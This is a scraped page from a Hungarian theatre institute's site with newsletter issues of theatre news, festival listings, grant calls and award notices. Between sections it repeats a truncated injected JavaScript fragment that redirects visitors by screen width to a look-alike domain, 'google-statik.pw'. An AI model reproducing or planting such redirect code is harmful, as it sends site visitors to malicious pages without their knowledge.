Az Impulstanz kereteben tart meghallgatast a Cirque du Soleil Becsben, 2008. juliusaban. A tarsulat jelenlegi es jovobeni szinpadi produkcioihoz keres sokoldalu, profi tancosokat, jo technikaval, szinpadi tapasztalattal es improvizacios kepesseggel.

A meghallgatasra online lehet jelentkezni: www.cirquedusoleil.com/casting


4.4. Az Essexi Egyetem (Nagy-Britannia) felhivasa

Az Essexi Egyetem „World Performance" elnevezesu kurzusahoz keres kurzusvezetot. Az uj kurzus celja, hogy felkeszitse a diakokat a performansz karrierjeben es ahhoz kapcsolodo teruleteken es alkalmazott eloadomuveszeti gyakorlatot kinal, kontextualis tanulmanyok letakarjak a vilagon fellelheto performansz stilusanak es formajanak teljes skalajat. Az idealis jelentkezo olyan hatterrel rendelkezik, amely kombinalja a megertest es a prkatikus performansz kepessegeket (nem nyugati formak kifejezetten keresettek) es mely ismerettel rendelkezik a nyugati es nem nyugati performansz muveszetrol.

Fizetes: 34,793 - 41,545 ?. Jelentkezesi hatarido: 2008. 06. 06.

Jelentkezni online lehetseges (hivatkozasi szam: TF592). Bovebb informacio telefonon is kerheto, telefonszam: (01206) 873521 / 874588.

Tovabbi informacio: http://www.east15.ac.uk/about/jobs.shtml

A hirlevelet keszitettek: Lakos Anna (szerk.,) Szabo Zsofi

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width
 
OSZMI-ITI HÍRLEVÉL 2008. október
Normal 0 21 false false false MicrosoftInternetExplorer4

1. Eloadasok, hirek

1.1 A Comedie-Francaise terve Bobignyben

1.2 „Lully szinhazi zseni volt."

1.3.A szinpad atlepi a hangsebesseget

1.4. Az aranykor: A brit szinhaz 1945 es 1968 kozott

1.5. Nemzetkozi kulturalis egyuttmukodes: a szakmai tokeletesseg keresese

1.6. Ingyen szinhazjegyek a 26 even aluliaknak

1.7.Ostermeier Hamlet-je a berlini Schaubuhneben

1.8. Jacques Attali: A Kristalyejszakatol a gazkamrakig

1.9. Ljubljanai kozonsegdij a Pantagruel sogornojenek

1.10 A rubel nagy csabero - RSC

2. Fesztivalhirek

2.1. Bowness Szinhazi Fesztival

2.2. Cheltenham Irodalmi Fesztival

2.3 III. Nemzetkozi Rendezoi Fesztival

2.4. Szinhazi Fesztival

3. Kortars drama

Jaan Tatte: Happy Everyday!

4. Folyoiratok - vitak, tematikus szamok

4.1. Alternatives Theatrales 96-97.

4.2. Alternatives Theatrales 98.

5. Felhivas, palyazat, informacio

5.1. FELHIVAS tancosok, koreografusok, rendezok, tanciskolak es tanccsoportok reszere

5.2. Az Accent Productions munkatarsakat keres

5.3. Palyazat nemzetkozi szinhazi partnerkapcsolatokra

5.4. Felhivas nemzetkozi konferencian valo reszvetelre

5.5. Felhivas nemzetkozi muhelymunkan valo reszvetelre

1. Eloadasok, hirek

1.1 A Comedie-Francaise terve Bobignyben

A francia kulturalis miniszter asszony Bobignyben tartott oktober 6-an sajtotajekoztatot es itt jelentette be, hogy a Seine-Saint-Denis-ben levo MC93 es a Comedie-Francaise egyuttmukodik egymassal a jovoben. A Le Monde ujsagiroja szerint kisse szurrealis volt ez az esemeny, mivel az MC93 igazgatojat, Patrick Sommier-t nem tajekoztattak az allam es a helyi onkormanyzat kozott folyo targyalasok megkezdeserol. Raadasul az ujsagiroknak kiosztott anyagok arrol tanuskodnak, hogy a kozos gondolkodas igen elorehaladt. A keszulo terv az MC93-at a Comedie-Francaise masodik epuletekent fogalmazza meg, vagyis a tarsulat a varosban, az ottani iskolakkal, gimnaziumokkal alakit ki kapcsolatot. A tervek szerint a Comedie-Francaise az MC93 probatermeben 18 orai kezdettel eloadasokat tartana egy szukebb, de hozzajuk kozel allo kozonsegnek

A sajtotajekoztaton Patrick Sommier nyilvanosan kritizalta a modszert, de ugyanakkor azt nyilatkozta, mindent megtesz, hogy egyutt dolgozzon Moliere hazanak jelenlegi igazgatojaval, a szineszno - rendezono Muriel Mayette-tel.

1.2 „Lully szinhazi zseni volt."

William Christie 1987-ben az Arts florissants karmesterekent, az akkori „cinkosaival", Jean-Marie Villegier rendezovel es Francine Lancelot koreografussal vittek szinre Lully: Atys cimu operajat, kirobbano sikerrel. Ez az eloadas lett a barokk ujrafelfedezesenek nyitanya.

2008. oktober 8-18 kozott a Theatre des Champs-Elysees-ben jatsszak Lully utolso muvet, az Armide-ot , amelynek rendezoje ugyszinten amerikai, Robert Carsen es a koreografus pedig Jean-Claude Gallotta.

William Christie eddig mar tobb Lully operat vitt sikerre, tobbek kozott 2005-ben a Comedie-Francaise-ben Moliere es Lully darabjat, A szerelem mint orvos-t. Christie szerint Lully nagyszeru humanista volt, muvei egyaltalan nem koptak meg, a bennuk megjelenitett erzelmek valosagosak. Ugy gondolja, hogy Lully felszabaditja Philippe Quinault szovegenek zeneiseget. Az Armide a tizenegyedik es egyben az utolso kozos alkotasa Quinault-val, es ez a legremekebb, amelyben a zenekar nagyszeruen integralodik a cselekmenybe.

1.3.A szinpad atlepi a hangsebesseget

Robert Lepage, a francia-kanadai „szinhazi mindenes" a latvanyrol a hangok birodalmara helyezte at a hangsulyt Lipsynch cimu, szunetekkel egyutt kilenc oras, fulekre komponalt „eposzaban". Szeptember 6-a es 14-e kozott volt lathato a Barbican Theatre-ben ez a kilenc emberi sorson es het evtizeden ativelo, varatlan es megrazo tortenetekkel teli, nagyszabasu munka. Lepage es az Ex Machina kilenc oras utra hivja a nezot, ahol tobbek kozott a haboru-sulytotta Becs, a forradalom elotti Nicaragua es a mai London erintesevel olyan emberekkel talalkozhatunk, akik elvesztettek a kepesseguket a beszedre - es olyanokkal is, akiknek a beszed az egyetlen ut az eletben maradashoz.

1.4. Az aranykor: A brit szinhaz 1945 es 1968 kozott

The Golden Generation: British Theatre 1945-1968 cimmel lathato november 30-ig a British Library kiallitasa, amelynek fo szandeka a masodik vilaghaboru es a szinhazi cenzura eltorlese kozotti brit szinhazban alkoto szineszek, rendezok es irok sokszinusegenek, lenduletenek es tehetsegenek bemutatasa. A kiallitas a szinhazi keziratok, levelek, fenykepek es szinhaztorteneti jelentosegu felvetelek tarhaza, olyan kincsekkel, mint John Osborne elso ket dramajanak (The Devil Inside Him, Personal Enemy) egyetlen fonnmaradt kezirata, az Entertainer kezzel irt, Laurence Olivier-nek kuldott peldanya, a felhaborodott rajongok leveleivel, hogy miert vallalt el ilyen szerepet. Tovabba Harold Pinter kezirasos Hazaterese, Samuel Beckett es Noel Coward hozza irt batorito levelei, valamint szamos fenykep, ami mind azt bizonyitja, hogy hany iro kezdte a palyajat szineszkent, mint peldaul Peter Nichols, John Osborne, Harold Pinter es Charles Wood.

1.5. Nemzetkozi kulturalis egyuttmukodes: a szakmai tokeletesseg keresese

Dr. Dragan Klaic, a leideni egyetem professzora 2008. szeptember 13-an Nemzetkozi kulturalis egyuttmukodes: a szakmai tokeletesseg keresese cimmel eloadast tartott a Muveszetek Palotajaban, amelyben a nemzetkozi kulturalis egyuttmukodes formait, modelljeit, strategiait vizsgalta. Elsosorban nem a kulturalis javak exportjara, vagy a sajat nemzeti kultura dicsoitesere es promociojara, hanem a szakmai fejlodesi folyamatok vizsgalatara helyezte a hangsulyt. Azok az egyenek es szervezetek, akik/amelyek ezt a hatarokon ativelo elkotelezettseget sajat fejlesztesi strategiajuk reszeve teszik, inspiraciot, kihivast, felivelo tanulasi folyamatot, potlolagos forrasokat es kozonseget talalnak a munkajukhoz. Az eloadasban szo volt arrol, hogy mennyiben valtoztak az igenyek es a lehetosegek a hideghaboru vegevel, es arrol is, hogy milyen szervezeti elvarasokat, finanszirozasi lehetosegeket, varatlan korulmenyeket illetve etikai es politikai kerdeseket vet fel a transznacionalis egyuttmukodes. Ezt kovette Sonja Greiner, az Europa Cantat fotitkaranak Sikeres lobbizas es kepviselet helyi, regionalis es europai szinten eloadasa a lobbizas (lobbying) es kepviselet (advocacy) fogalmanak tisztazasarol, valamint arrol, hogy milyen celokat es irott vagy iratlan szabalyokat kovessunk kulturalis szakemberkent, amikor ezt a munkat vegezzuk kulonbozo szinteken.

1.6. Ingyen szinhazjegyek a 26 even aluliaknak

Andy Burnham brit kulturalis miniszter szeptember 23-an jelentette be, hogy uj programjaban tamogatni kivanja a 26 ev alatti fiatalok szinhazbajarasat. Az angliai Arts Council altal finanszirozott 2.5 millio fontos terv 95 helyszinen valosul meg: a szinhazak minden heten ugyanazon a napon a jegyek egy adott szazalekat ingyen adjak barkinek, aki 26 ev alatt van. A program 2009 februarjaban indul, azzal a cellal, hogy 2011 marciusaig az elo szinhazi elmenyt kereso fiataloknak egy millio ingyenjegyet biztositson. Az erintett szinhazaknak garantalniuk kell a megfelelo szamu ingyen szeket a teljes ket eves periodusban. Andy Burnham szeretne, ha ez a befektetes folyamatossa valna a tervben reszt vallalo szinhazakban, ami jelentos lepes lenne egy uj kozonsegreteg kiepiteseben. „A kultura eleteket tud megvaltoztatni. Magam is sokszor tapasztaltam ezt. Egy fiatalnak a szinhazi eloadas a velejeig hato elmeny lehet, uj tavlatokat megnyito ero. De sokszor elmennek a lehetoseg mellett, mert ugy erzik, hogy a szinhaz nem nekik szol. Ideje, hogy megvaltoztassuk ezt a felfogast"-nyilatkozott a miniszter.

1.7.Ostermeier Hamlet-je a berlini Schaubuhneben

Athen es Avignon utan a berlini Schaubuhne is musorra tuzte, es oktober 10. es 12. kozott mutatta be Thomas Ostermeier Hamlet-rendezeset. Ostermeier mindossze hat szineszre adaptalta a darabot, a kiralyi udvart korrupt rendszernek abrazolva, ahol a gyilkossag es az erotika mindennapos, bevett eszkozok a hatalom megtartasahoz. A foszereplo, Lars Eidinger tozeggel bekent arca belenk vesodik: ebben a Hamletben nincs ketelkedes. Kuzd a csalad, az allam es a sajat tehetetlensege ellen.

1.8. Jacques Attali: A Kristalyejszakatol a gazkamrakig

A Theatre du Rond-Point szeptember 16-an Daniel Mesguich rendezeseben mutatja be a politikus es iro Jacques Attali darabjat, amely tortenelmi kutatasokra es tanuvallomasokra epul. 1938. november 12-en Berlinben a legfobb naci vezerek Goring irodajaban talalkoztak, hogy megvitassak a ket nappal korabban, a Kristalyejszaka soran elkobzott zsidovagyonok sorsat. A szereplok kozott van Gobbels, a propagandaminiszter, Himmel, az SS fonoke, az o helyettese, Heydrich, es Eduard Hilgard, aki a nemet biztositotarsasag vezetoje. Goring azt akarja megertetni Hilgarddal, hogy szo sem lehet arrol, hogy a biztosito fizessen a zsidokat ert karokert. Hilgard viszont arra az allaspontra helyezkedett, hogy nem lehet a mar megkotott szerzodeseket ervenyteleniteni. A vitaban a politikai, diplomaciai erdekek, a biztositasi szabalyok es a szemelyes erdekeltsegek utkoztek, de ami osszekoti oket, az a gyulolet, a megallapodas, hogy a zsidokat deportalni kell. Hilgard, aki a nemet biztositok erdekeinek vedelmeben jott, gyoztesen tavozik a megbeszelesrol, amely nelkule folytatodik tovabb, es egyre radikalisabb fordulatot vesz. De hogyan lehet semlegesiteni a zsidokat? Ez a kerdes foglalkoztatja oket a tovabbi beszelgetesben, es lassan eljutnak a vegso megoldasig. Ez volt az elso alkalom, amikor a zsidok megsemmisitesenek kerdese konkretan felvetodott, tehat joval az 1942. januar 20-ai wannsee-i konferencia elott. A darabnak az az erdeme, hogy egy ismeretlen tortenelmi esemenyt tesz kozkinccse, amely nem jott volna napvilagra, ha 1998-ban azoknak a zsido csaladoknak a leszarmazottai pert nem inditanak a biztosito ellen, amely nem kartalanitotta oket. Attali munkaja valojaban nem szindarab - olyan, mintha valaki szamlat nyujtana be, mintha iskolamester lenne, aki azt mondja az osztaly elott: Gyerekek, jegyzeteljetek. Targy: Hogyan jutottak el a nacik a vegso megoldashoz.

A rendezo egyaltalan nem akarja teatralizalni a darabot, sot, ellenkezoleg.

1.9. Ljubljanai kozonsegdij a Pantagruel sogornojenek

Szeptember 23-an zarult a ljubljanai Ex Ponto Nemzetkozi Szinhazi Fesztival, amelyen a Kolozsvari Allami Magyar Szinhaz Visky Andras: Hosszu pentek cimu eloadasaval (rendezo: Tompa Gabor) es a Rabelais muveibol inspiralodott Pantagruel sogornoje cimu eloadassal (rendezo: Silviu Purcarete) vett reszt. A fesztival kozonsege - tobb, mint 3500 nezo - az elozo evekhez hiven szavazhatott a kedvenc eloadasaira, 1-5 kozt rangsorolva a produkciokat. A szavazatok alapjan 4.68 pontot ert el a Pantagruel sogornoje, es ezzel iden a Kolozsvari Allami Magyar Szinhaz, a Szebeni Radu Stanca Szinhaz es a lyoni Silviu Purcarete Tarsulat koprodukcioja nyerte el az Ex Ponto Nemzetkozi Szinhazi Fesztival idei kozonsegdijat.

1.10 A rubel nagy csabero - RSC

A Royal Shakespeare Company uj, tokevonzo vallalkozasba kezd: jovore - specialis tamogatasi penzbol - negy, Oroszorszagrol illetve a volt Szovjetunio orszagairol szolo darabot allit szinpadra Stratford-upon-Avonben, billios nagysagrendu nemzetkozi befektetes remenyeben. Michael Boyd, a RSC muveszeti igazgatoja, aki palyaja elejen Moszkvaban kapott kepzest, ugy nyilatkozott az Independent- nek, hogy nem titkolt szandeka, hogy az orosz toket a szinhazba vonzza. A kepzomuveszetben mar elindult ez a folyamat : az elmult evek londoni festmenyarveresein egyre nagyobb szamban jelennek meg az orosz vevok. A project elokeszuletei harom eve zajlanak, es Boyd szamara komoly motivaciot jelent, hogy rendezokent is reszt vegyen Oroszorszag szinpadi hagyomanyainak megorzeseben. Mihail es Viacseszlav Durnyenkov Drunks cimu, egy Csecsenfoldrol visszatero katonarol szolo darabja jovo szeptemberben kerul szinpadra, ugyanigy Natalia Voroszbit The Grain Store cimu dramaja, a 1930-as evek ukrajnai ehinsegerol, Boyd rendezeseben. A sorozat folytatodik 2011-ben ujabb ket orosz vonatkozasu premierrel: Roxana Silbert viszi szinre Rona Munro Little Eagles cimu tortenelmi dramajat, majd a Silence kovetkezik, ami egy kiabrandult brit ujsagiro utjat koveti Moszkvaba.

2. Fesztivalhirek

2.1. Bowness Szinhazi Fesztival

Immar tizennegyedik alkalommal rendezik meg a Bowness Szinhazi Fesztivalt a festoi Lake District-beli Bowness-in-Windermere-ben. A oktober 4-tol december 30-ig tarto program nagyon vegyes: utazo turneprodukciok, helyi amatorszineszek performanszai, komolyzenevel, filmekkel es vigjatekokkal fuszerezve. A rendezvenynek az Old Laundry Theatre ad otthont.

A turnek kozt szerepel tobbek kozott Victor Spinetti A Very Private Diary ... Revisited! cimu munkaja, amiben bepillantast nyerhetunk titkos hollywoody naplojaba, aztan Sir Anthony Hopkins rendezeseben lathato a hires walesi koltot alakito Bob Kingdom es Dylan Thomas: Return Journey. Helyet kap a musorban a LAMDA (The London Academy of Music and Dramatic Arts) hallgatoinak eloadasaban Arthur Miller: Pillantas a hidrol, valamint Harold Pintertol a Party Time es az Unnep Michael Billington, a Guardian hires szinhazkritikusanak rendezeseben.

2.2. Cheltenham Irodalmi Fesztival

2008. oktober 10. es 19. kozott rendezik meg a Times Cheltenham Irodalmi Fesztivalt, ahol szamos szinhazzal, szinjatszassal es filmmel kapcsolatos programon vehetnek reszt az erdeklodok.

Tovabbi informacio: http://cheltenhamfestivals.com/whats_on/literature_festival.html

2.3 III. Nemzetkozi Rendezoi Fesztival

A III. Nemzetkozi Rendezoi Fesztival nemetorszagi resze november 14-en es 15-en lesz Lipcseben, ahol Shakespeare Hamletjenek tizenket interpretacioja kerul szinpadra.

Tovabbi informacio: www.regiefestival.de

2.4. Szinhazi Fesztival

Az Oldenburgische Staatstheater oktober 17. es 26. kozott rendezi meg a Nemzetkozi Performing Arts Fesztivalt, a Pazzt.

Tovabbi informacio: www.staadstheater.de

3. Kortars drama

Jaan Tatte: Happy Everyday!

Jaan Tatte eszt dramairo, dalszovegiro, szinesz es enekes.

Egyfelvonasos

Szereplok: ket ferfi, ket no

Annette gyerekeik tavolleteben hazaerkezik egy hosszu hetvegerol, es politikus ferjet, Fredet felreertheto helyzetben talalja a szomszednovel, Annaval. Bevallja ferjenek, hogy az ut alatt beleszeretett egy ferfias, mely hangu legiutaskiserobe, Manfredbe, akit meglepetes ajandekkent magaval hozott. Anette egyikukrol sem akar lemondani, ezert azt javasolja, hogy harmasban eljenek ezutan. Idonkent felbukkan Anna, aki dobbenten tapasztalja a csaladban az uj helyzetet.

Egyik este, amikor elerkezik a lefekves ideje, Annette Manfredot hivja a haloszobaba, Frednek a kanapet kinalja fol a nappaliban. Manfred azonban nem el a lehetoseggel, kozli, hogy a szex regota nem erdekli, es oruljenek inkabb a koztuk levo „szellemi osszhangnak". Annette ekkor Fredet hivja be, de o sem mutat erdeklodest. A ket ferfi egyedul marad a nappaliban, majd Fred a gyerekszobaba megy lefekudni. Manfred kisvartatva felkeresi Fredet, hogy fel ejszaka, es nem tud egyedul aludni, es (a hatterben elvonulo Annette szeme lattara) megkornyekezi a ferfit - sikertelenul. Ekkor megjelenik Anna, aki Fredet egyedul talalja a nappaliban, es esetlenul felkinalkozik neki. Manfred visszajon (ami nem zavarja Annat), es szexualis tanacsokkal latja el a lanyt, mikozben Anna Fredet probalja felizgatni. Vegul Anna es Manfred felajzva elvonulnak, es a hazaspar magara marad. Rajonnek, hogy sokat hibaztak a multban, es hogy boldogok egyutt. Varjak haza a gyerekeket.

4. Folyoiratok - vitak, tematikus szamok

4.1. Alternatives Theatrales 96-97

A folyoirat a chilei szinhazat mutatja be tematikus szamaban. Az otlet a Centre Dramatique du Manege de Mons igazgatojatol, Daniel Cordovatol szarmazik. A belga szinhazi lap egyik foszerkesztoje, Bernard Debroux cikkeben kifejti, hogy a Chileben a diktatura eveiben azert lehetett a szinhaz az ellenallas szinhelye, mert nem allt olyan eros kontroll alatt, mint a film, a televizio es az irodalom. A diktatura bukasa utan, es kulonosen az utobbi evekben, a szinhazak meg inkabb viragzanak, peldaul 2006-ban ketszaz bemutatot tartottak. A chilei szinhazban kulonosen fontos szerepet kapott az utobbi tiz evben a szembenezes sajat tortenelmukkel, kollektiv emlekezetukkel. Tobb eloadas szatirikusan, ironikusan dolgozza fel a posztdiktatura korszakat. A folyoiratban olvashato cikkek a legjelentosebb rendezoket, dramairokat, szinhazakat mutatjak be.

4.2. Alternatives Theatrales 98

A szam apropojat a 2008-as Avignoni Fesztivalon szereplo eloadasok adtak, es a lap kivetelesen nem kritikakat, hanem a fesztivalon szereplo muveszek eletpalyaja alapjan az oktatassal, a muveszi tapasztalatok atadasanak lehetosegeivel, modjaival foglalkozo, azokat bemutato irasokat, interjukat kozol. Tobbek kozott olvashato Georges Banu irasa Valerie Dreville szinesznorol, aki Antoine Vitez tanitvanya volt, es az utobbi evekben Anatolij Vasziljevvel dolgozott egyutt. Denis Guenoun tanulmanyaban (Alkoto atadas) azt vizsgalja, hogy a XX. szazadi szinhaz nehany kiemelkedo muvesze, Dullin, Brecht, Grotowski, Antoine Vitez, milyen pedagogiai modszerrel adta at tudasat a kovetkezo generacionak. A Stanislas Nordey szinesz-rendezovel keszult interjuban a muvesz arrol beszel, hogy az atadas muveszete a rendezes alapja; eszerint dolgozik rendezokent, es szineszkent ezt varja el a rendezotol. Figyelemre melto George Banu cikke Antoine Vitezrol, a pedagogusrol es rendezorol, valamint Stephanie Lupo irasa, amelyben beszamol arrol, hogy milyen tapasztalatokat szerzett Vasziljev diakjakant a lyoni szinmuveszetin, az ENSATT-on. Vegul egy interju olvashato Romeo Castelluccival, aki Dante Isteni szinjatekabol harom kulonallo eloadast keszitett Avignonban, Inferno, Purgatorio es Paradiso cimmel.

5. Felhivas, palyazat, informacio

5.1. FELHIVAS tancosok, koreografusok, rendezok, tanciskolak es tanccsoportok reszere


A Barcelona Dance Award nevu, balett- es modern tancosoknak, palyakezdo es tapasztalattal rendelkezo koreografusoknak es tanctarsulatoknak megrendezett nemzetkozi versenyre immar huszadik alkalommal kerul sor, 2009. aprilis 9. es 13. kozott Barcelonaban, valamint junius 18. es 22. kozott Olaszorszagban es junius vegen Parizsban. Kozel otven indulo es befutott tanccsoport ill. tarsulat versenymunkaja lesz lathato, marathoni eloadassorozatban.
Tovabbi informacio: This e-mail address is being protected from spambots. You need JavaScript enabled to view it
A jelentkezesi lap letoltheto: http://web.tiscali.it/awardance08/



5.2. Az Accent Productions munkatarsakat keres

A Brusszelben levo, de angol munkanyelvu Accent Productions nevu szintarsulat munkatarsakat keres. Uj projectjuk, a „ Shakespeare the European" abbol a celbol jott letre, hogy a 27 tagorszagbol szineszeket toborozzanak, es eloadasi lehetoseget biztositsanak az interkulturalis parbeszed jegyeben. Az alabbi feladatkorokben keresnek partnereket:

1. Helyi tamogatas, ami a szineszek megtalalasaban, castingjeben merul ki.

2. Egyuttmukodo partnerek, kozos produkcio remenyeben, akik idovel elviszik az eloadast a sajat orszagukba is.

3. Befogadohelyek biztositasa az Accent Productions turneinak szamara.

Tovabbi informacio: Michel Didier

http://www.accent-prod.com/

+32 474 88 84 84

5.3. Palyazat nemzetkozi szinhazi partnerkapcsolatokra

Nemzetkozi szinhazi partnerkapcsolatok kiepitesenek tamogatasara hirdetett palyazatot a Nemet Szovetsegi Kulturalis Alapitvany Wanderlust neven. (on-the-move)

Nemetorszagi szinhazak es mas orszagokban mukodo szinhazak kozott kiepulo partnerkapcsolatokat tamogat a a Nemet Szovetsegi Kulturalis Alapitvany Wanderlust cimu palyazata (a fogalom a nemetek utazasi hajlamat jelkepezi, beleertve azt a lehetoseget is, hogy ha megtetszik nekik egy hely, keszek orokre ott maradni). A felhivas kereteben 2, illetve 3 evadon keresztul tamogatjak a szinhazi csereket es partnerkapcsolatokat. A program elso eveben a muveszek kozotti cseret tamogatjak, a masodik evben a partnerszinhaz vendegszerepleset a nemet szinhazban, a harmadik evben pedig egy kozos koprodukcio letrehozasat, amelyet a felek mindket orszagban eloadnak. Partnerkapcsolatonkent legfeljebb 150 ezer euros tamogatas igenyelheto, a szukseges onresz 25%.

Jelentkezesi hatarido: 2008. oktober 15.

Tovabbi informacio:

German Federal Cultural Foundation; 1 Franckeplatz 06110 Halle/ Saale Deutschland - Anita Kerzmann

This e-mail address is being protected from spambots. You need JavaScript enabled to view it
www.kulturstiftung-des-bundes.de
T: +49 345-2997161
F: +49 345-2997333

5.4. Felhivas nemzetkozi konferencian valo reszvetelre

"Performing Arts Training Today"

Szineszeknek, rendezoknek, tancosoknak, koreografusoknak, diszlettervezoknek, dramairoknak, forgatokonyviroknak, oktatoknak szol a felhivas.

A Global Theatre Experience (IUGTE) es az ArtUniverse (London, UK) Bovecben, Szloveniaban rendezi meg oktober 24. es 27. kozott a „Performing Arts Training Today" nevu, gyakorlatkozpontu workshopokbol, bemutatokbol, performance-toredekekbol es eloadasokbol allo nemzetkozi konferenciat. Nehany fontos nev a resztvevok kozul: Izumi Ashizawa (Japan), Sergei Ostrenko (Oroszorszag), Frances Charteris (USA), Kimberly Davis(USA).

Jelentkezes oneletrajzzal es rovid motivacios levellel a kovetkezo e-mail cimeken: This e-mail address is being protected from spambots. You need JavaScript enabled to view it

This e-mail address is being protected from spambots. You need JavaScript enabled to view it

Tovabbi informacio a programrol: http://www.iugte.com/projects/programme.php
Szallas: http://www.iugte.com/projects/Bovec.venue.php


5.5. Felhivas nemzetkozi muhelymunkan valo reszvetelre

„Discovering Performer's Physicality"

Szergej Ostrenko rendezeseben november 1. es 7. kozott a sved Ystadban tartando nemzetkozi workshopon valo reszvetelre varjak tancosok, szineszek, cirkuszi eloadok, rendezok es koreografusok jelentkezeset. A muhely celja mozgastrening, hogy az eloadasokon, gyakorlati orakon es megbeszeleseken keresztul a resztvevok a mozgasban fedezzek fel a kortars eloadomuveszet lenyeget.

A workshop alatt szallast es etkezest biztositanak.

Reszletes program es jelentkezes: http://www.iugte.com/projects/performers.physicality.php



A Hirlevelet keszitette: Lakos Anna (szerk.), Rakoczy Anita

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width
 
Hevesi Sándor-díj 2010

A Nemzetkozi Szinhazi Intezet Magyar Kozpontja javaslatara, 1998-ban szuletett meg a Hevesi Sandor-dij, amelyet az Oktatasi es Kulturalis Miniszterium, a Fovarosi Onkormanyzat es az ITI Magyar Kozpont hozott letre.

A dijat harom, Magyarorszagon elo es alkoto szinhazmuvesz vagy a szinhazert dolgozo szemely kaphatja, aki muveszi munkajaval, aldozatokat vallalo tettrekeszsegevel, peldaerteku elszantsagaval a legtobbet tette szinhazmuveszetunk kulfoldi megismerteteseert, elismerteteseert. A dijat a tagok elozetes javaslata alapjan letrejott listabol az Oktatasi es Kulturalis Miniszterium szakallamtitkarabol, a Fovarosi Onkormanyzat kepviselojebol es az ITI Magyar Kozpont elnokebol allo kuratorium iteli oda es adja at a Szinhazi Vilagnapon. A kitunteto okleveleket 2010-ben az Operettszinhazban kivetelesen marcius 29-en adtak at. Iden Alfoldi Robert, a Nemzeti Szinhaz foigazgatoja reszesult Hevesi-dijban magas szinvonalu kulfoldi rendezeseiert, valamint Berczes Laszlo rendezo, a Barka Szinhaz dramaturgja, a Barka Nemzetkozi Fesztival elinditasaert es szervezeseert, es Ladanyi Andrea tancos-szinesz-koreografus, aki sokat tett a tancmuveszet nemzetkozi kapcsolatainak epiteseert.

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width
 
Nemzeti Színház a 21. században - Nemzetközi konferencia Budapesten

2010. januar 29-en es 30-an nagy sikerrel zajlott a Nemzeti Szinhaz a 21. szazadban elnevezesu konferencia az ITI Magyar Kozpont szervezeseben a Nemzeti Szinhazban. Szlovakia, Csehorszag, Romania, Nemetorszag, Esztorszag es Lengyelorszag Nemzeti Szinhazainak igazgatoit, muveszeti vezetoit lattak vendegul egy szuk koru kerekasztal-beszelgetes kereteben, ahol tobb nemzetkozi rangu kritikussal es meghivott magyar vendegekkel arra kerestek a valaszt, hogy mi a szerepe, funkcioja a Nemzeti Szinhaz intezmenyenek a 21. szazadban. A konferencia anyagat remenyeink szerint magyar es angol nyelven is kozreadjuk, hogy mindenki hozzaferhessen. A kerekasztalbeszelgetes alkalmabol adta ki az ITI Magyar Kozpont az OSZMI-val szovetkezve a Hungarian Theatre Bulletin 2009 cimu, angol nyelvu kiadvanyt, ami a kulfoldi szakma tajekoztatasara szolgal az elmult ket evad magyarorszagi szinhazi esemenyeirol.

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width
 
Bemutatkozunk - Munkatársak

Munkatarsak:

Lakos Anna: elnok

Jakus Monika: konyvelo

 

A Nemzetkozi Szinhazi Intezet Magyar Kozpontjanak cime:

1013. Budapest, Krisztina krt. 57.
Telefon/Fax: 1/212-5247, Telefon: 225-0874

E-Mail: This e-mail address is being protected from spambots. You need JavaScript enabled to view it

Honlap: www.itihun.hu

 

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width
 
<< Start < Prev 11 12 13 Next > End >>

Page 12 of 13